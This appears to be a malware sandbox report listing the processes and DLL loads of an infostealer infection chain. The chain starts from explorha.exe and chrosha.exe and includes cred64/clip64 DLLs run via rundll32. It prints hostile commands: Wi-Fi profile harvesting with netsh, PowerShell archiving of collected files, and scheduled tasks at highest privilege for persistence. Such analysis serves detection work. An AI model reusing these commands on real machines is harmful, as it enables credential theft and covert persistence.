Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe "C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe "C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe"
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5564 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3896 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe "C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe"
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,11986883696083450326,11027901686881542534,262144 /prefetch:8
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3476 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe "C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe"
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 2108
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe "C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe"
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 2156
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4752 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe "C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe"
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe "C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe "C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5564 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3896 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3476 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,11986883696083450326,11027901686881542534,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4752 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
